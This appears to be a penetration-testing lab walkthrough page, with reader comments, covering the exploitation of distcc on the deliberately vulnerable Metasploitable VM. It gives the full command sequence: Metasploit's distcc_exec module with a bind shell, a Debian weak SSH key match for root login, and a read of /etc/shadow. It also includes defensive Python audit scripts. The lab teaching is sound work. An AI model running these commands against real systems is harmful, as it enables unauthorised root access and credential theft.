Watch video on-line: http://g0tmi1k.blip.tv/file/3826063
Download video: http://www.mediafire.com/?mpxdj30sx66t4lv
Download (debian_ssh_rsa_2048_x86.tar.bz2): http://www.mediafire.com/?i2mnwymzt51
What is this?
This video demonstrates an attack on the DistCC service on the metasploitable hackable box.
"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com
"distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile" - distcc.samba.org
Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to send a payload (remote access)
> *I cheated a little bit here as I had used Nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
> Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
> Connect via SSH as root (complete access)
> Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)
What do I need?
> Nmap --- on Backtrack 4 (Final)
> Metasploit --- on Backtrack 4 (Final)
> SSH --- on Backtrack 4 (Final)
> Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) --- http://www.mediafire.com/?i2mnwymzt51
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
> Metasploitable.part01.rar ~ http://www.mediafire.com/?dy2jl2wmw5h (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
> Metasploitable.part02.rar ~ http://www.mediafire.com/?3zrz2wjmjmz (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
> Metasploitable.part03.rar ~ http://www.mediafire.com/?nmjmyimmqwm (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
> Metasploitable.part04.rar ~ http://www.mediafire.com/?gdjyzfjyjzm (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)
Commands:
nmap 192.168.1.1/24
nmap -sS -sV -p1-65535 -O -f -n -v 192.168.1.105
msfconsole
search distcc
use exploit/unix/misc/distcc_exec
show options
setg RHOST 192.168.1.105
show payloads
setg payload generic/cmd/unix/bind_perl
show options
exploit
ls
whoami
ls -lart /root
ls -lart /root/.ssh
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
Firefox www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048/
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
whoami
hostname
ifconfig
cat /etc/shadow
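The grep above checks one key by hand against the unpacked weak-key set. The same check, done the way a defender audits a host's authorized_keys, is to fingerprint every key and look each fingerprint up in a blacklist (Debian's ssh-vulnkey worked on MD5 fingerprints). The script below is an added example, not code from the video or from any of the tools it uses: it parses authorized_keys lines, decodes the ssh-rsa wire format to report the exponent and modulus size, and flags any key whose fingerprint is in a blacklist set. The sample input is constructed: the first entry is the key shown above, the second is a structurally valid but non-functional placeholder, and the blacklist is a stand-in seeded with the page key's own fingerprint (a real run would load the fingerprints of the predictable keys from the blacklist files, which use their own layout). The comment `ops@example.invalid` is an invented label.

```python
import base64
import hashlib
import struct

# The public key the walkthrough finds in /root/.ssh/authorized_keys.
PAGE_KEY_BLOB = (
    "AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6P"
    "VxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyF"
    "KAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa6"
    "6X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0"
    "e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoX"
    "fdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXov"
    "cNnbALTp3w=="
)


def _ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH wire-format string (uint32 length + payload)."""
    return struct.pack(">I", len(data)) + data


def _read_ssh_string(buf: bytes, off: int):
    """Read one SSH wire-format string at off; return (payload, next offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4 : off + 4 + n], off + 4 + n


# Constructed, non-functional 2048-bit "key" for the second sample entry.
# The modulus is filler, not a real RSA modulus; only the wire layout matters.
CONSTRUCTED_KEY_BLOB = base64.b64encode(
    _ssh_string(b"ssh-rsa")
    + _ssh_string(b"\x01\x00\x01")               # e = 65537
    + _ssh_string(b"\x00\x80" + b"\x11" * 255)  # 2048-bit modulus placeholder
).decode("ascii")

# Constructed authorized_keys content: the page's key plus the placeholder.
SAMPLE_AUTHORIZED_KEYS = (
    "# constructed sample authorized_keys\n"
    f"ssh-rsa {PAGE_KEY_BLOB} msfadmin@metasploitable\n"
    f"ssh-rsa {CONSTRUCTED_KEY_BLOB} ops@example.invalid\n"
)


def parse_authorized_keys(text: str):
    """Yield (key_type, blob_b64, comment) per key line (option prefixes not handled)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2)
        if len(parts) < 2:
            continue
        yield parts[0], parts[1], parts[2] if len(parts) == 3 else ""


def rsa_params(blob: bytes):
    """Return (e, modulus_bits) for an ssh-rsa blob, or None for other key types."""
    key_type, off = _read_ssh_string(blob, 0)
    if key_type != b"ssh-rsa":
        return None
    e_bytes, off = _read_ssh_string(blob, off)
    n_bytes, _ = _read_ssh_string(blob, off)
    return int.from_bytes(e_bytes, "big"), int.from_bytes(n_bytes, "big").bit_length()


def md5_fingerprint(blob: bytes) -> str:
    """Hex MD5 of the raw key blob (the fingerprint form the Debian blacklist used)."""
    return hashlib.md5(blob).hexdigest()


def audit(text: str, weak_fingerprints: set) -> list:
    """Fingerprint every key in an authorized_keys text and flag blacklisted ones."""
    results = []
    for key_type, blob_b64, comment in parse_authorized_keys(text):
        blob = base64.b64decode(blob_b64)
        fp = md5_fingerprint(blob)
        params = rsa_params(blob) if key_type == "ssh-rsa" else None
        results.append({
            "type": key_type,
            "comment": comment,
            "fingerprint": fp,
            "e": params[0] if params else None,      # e = 35 is typical of OpenSSH keys of that era
            "bits": params[1] if params else None,
            "weak": fp in weak_fingerprints,
        })
    return results


# Stand-in blacklist (constructed): seeded with the page key's own fingerprint
# so the sample run flags it. A real audit loads the blacklist files instead.
WEAK_FINGERPRINTS = {md5_fingerprint(base64.b64decode(PAGE_KEY_BLOB))}

if __name__ == "__main__":
    for r in audit(SAMPLE_AUTHORIZED_KEYS, WEAK_FINGERPRINTS):
        flag = "WEAK" if r["weak"] else "ok"
        print(f"{flag:4} {r['type']} {r['bits']}-bit e={r['e']} {r['comment']} md5:{r['fingerprint']}")
```

Run against a real host, the same loop over every user's authorized_keys (and /etc/ssh/*.pub for host keys) tells you whether a predictable key is still trusted anywhere, which is the question the video's grep answers for a single key.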
Notes:
Song: Josh Abrahams - Joker
Video length: 4:51
Capture length: 6:28
Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-distcc.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30079-%5Bvideo%5D-metasploitable-distcc.html#post167045
~g0tmi1k
First: Thank you for posting great videos like these, I like them!
However I am unable to use the Metasploitable because I am unable to download:
Metasploitable.part03.rar
It seems the link is broken, I downloaded parts 1, 2 and 4 successfully.
@Mario
It looks like part3 is working again. (=
@g0tmi1k
Thank you for the response, now I can follow all of your videos on Metasploit and gain more knowledge :p
@Mario
Thanks for letting me know it's working for you!
Hope you have fun with it ;)
What's the username and password of your Metasploitable image?
thx for your howto ;)
@Bubi
That's the idea of Metasploitable, you have to hack it to gain access. You're not meant to know the username/password when you start.
hey g0tmi1k, how exactly does this exploit work? I just followed your video and gained root access to the Metasploitable box but I'm more interested in how exactly this works. I saw that you used Nessus to find the OpenSSL vulnerability, however how did you know how to use the exploit? I've gone to exploit-db and looked through the exploits for this vuln and none of them have done it the same way you have here. I guess I'm just highly curious. Thanks for your time :)
Also, if you had NOT found the vuln via Nessus, what would you have done once you ran "exploit" from the Metasploit console and gained a shell? What steps would you have taken at that point to further penetrate the system? Thanks again!
@MuLiTiAx
The best way to understand how the exploits work is by reading any advisories and then the exploit code itself ;) *see the links below*
In short, if distcc isn't "correctly" configured, there is a mistake in the code that doesn't check to see if the user is authorized, and it just executes their commands.
You find vulnerabilities by enumeration, enumeration and more enumeration!
I skipped this stage out of the video - as I was trying to keep it short & it's the same for every vulnerability in Metasploitable (didn't want to do it 5 times!)
One way of finding it out: port scan (unicornscan/nmap), banner grab (netcat/amap/nmap), search exploit databases (exploit-db.com/1337day.com), exploit it!
One of Nessus's features is to automate the above as much as it can: it port scans, then enumerates to see what service is running and the potential version by fingerprinting, and then has an in-built database of known vulnerabilities which it checks.
Overall, before I recorded the video, there was lots of trying; lots of times whatever I was doing failed.
You might want to check out the "pentest standard" link too....
Well, the exploit used gave me remote root access, and there isn't any higher level of user to reach - hence why I didn't need to "further penetrate the system".
If you mean Privilege Escalation (e.g. how do I get root?), that's not a simple task. Most boot2roots use "kernel" exploits, but normally it's harder than that. For a rough idea, see here: http://g0tmi1k.blogspot.com/2011/08/basic-linux-privilege-escalation.html
If you mean, is there another way in, there are other vulns in the system too (see the other 4 videos).
The system/VM was meant to be broken, so these entry points were added in.
--- Links ---
CVE Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-2687
*distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks*
OSVDB Link: http://osvdb.org/13378
*distcc contains a flaw that may allow a malicious user to execute arbitrary commands. distcc does not perform any authentication or authorization of connections, and instead relies on 3rd party access controls. It is possible that the flaw may allow arbitrary command execution resulting in a loss of integrity.*
The metasploit exploit module: http://www.metasploit.com/modules/exploit/unix/misc/distcc_exec
Metasploit Exploit source code: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/unix/misc/distcc_exec.rb
Nessus: http://www.nessus.org/plugins/index.php?view=single&id=12638
Pentest Standard: http://www.pentest-standard.org/index.php/Main_Page
In short, there isn't a magic answer - just lots of enumeration and attempts which usually fail ;)
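The CVE and OSVDB text quoted above both make the same point: distccd performs no authentication of its own, so the only thing standing between "build server" and "remote command execution" is the allowlist passed to it (and whatever the firewall adds). The script below is an added example, not part of the post or of the distcc project: it parses a Debian-style /etc/default/distcc fragment and reports the settings that leave the daemon open. Both fragments are constructed; the variable names STARTDISTCC, ALLOWEDNETS and LISTENER are the ones Debian's package uses, but how the init script maps them onto distccd's --allow and --listen flags is assumed here, so check it against your own distribution's script.

```python
import ipaddress
import shlex

# Constructed /etc/default/distcc fragment: started, bound everywhere, allows everyone.
WEAK_DEFAULTS = """\
STARTDISTCC="true"
ALLOWEDNETS="0.0.0.0/0"
LISTENER="0.0.0.0"
"""

# Constructed hardened fragment: only the build network may connect, bound to one address.
HARDENED_DEFAULTS = """\
STARTDISTCC="true"
ALLOWEDNETS="192.168.1.0/24"
LISTENER="192.168.1.10"
"""


def parse_defaults(text: str) -> dict:
    """Parse KEY="value" lines of a shell-style defaults file into a dict."""
    values = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, raw = line.partition("=")
        parsed = shlex.split(raw)          # strips the shell quoting
        values[key.strip()] = parsed[0] if parsed else ""
    return values


def audit_distcc(text: str) -> list:
    """Return findings (strings) for a distcc defaults fragment; empty list means no issue found."""
    cfg = parse_defaults(text)
    findings = []
    if cfg.get("STARTDISTCC", "false").lower() != "true":
        return findings                   # daemon disabled; nothing to assess

    nets = cfg.get("ALLOWEDNETS", "").split()
    if not nets:
        findings.append("ALLOWEDNETS is empty: no --allow list is passed to distccd")
    for net in nets:
        try:
            network = ipaddress.ip_network(net, strict=False)
        except ValueError:
            findings.append(f"ALLOWEDNETS entry {net!r} is not a valid address or CIDR")
            continue
        if network.prefixlen == 0:
            findings.append(f"ALLOWEDNETS entry {net} admits every address")

    listener = cfg.get("LISTENER", "")
    if listener in ("", "0.0.0.0", "::"):
        findings.append("LISTENER binds all interfaces; bind to the build-network address")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_DEFAULTS), ("hardened", HARDENED_DEFAULTS)):
        print(f"{name}: {audit_distcc(text) or ['no findings']}")
```

The allowlist check is deliberately strict about /0 only; whether a broader private range such as a /16 is acceptable depends on the site, which is the kind of judgement the OSVDB note ("relies on 3rd party access controls") leaves to the operator.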
Hey there, your videos are great and thanks for sharing!
One question that I don't understand in this specific video... you find in the file /root/.ssh/authorized_keys a public key. I can see that this key belongs to msfadmin. BUT you use the corresponding private key in ssh to log in as root and not as msfadmin... why do you do this? Do you guess that they use the same private key?? Are they both administrator accounts???
TIA